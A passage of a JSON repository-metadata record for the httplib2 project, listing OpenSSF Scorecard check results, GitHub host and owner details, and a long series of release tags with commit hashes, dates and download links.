detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":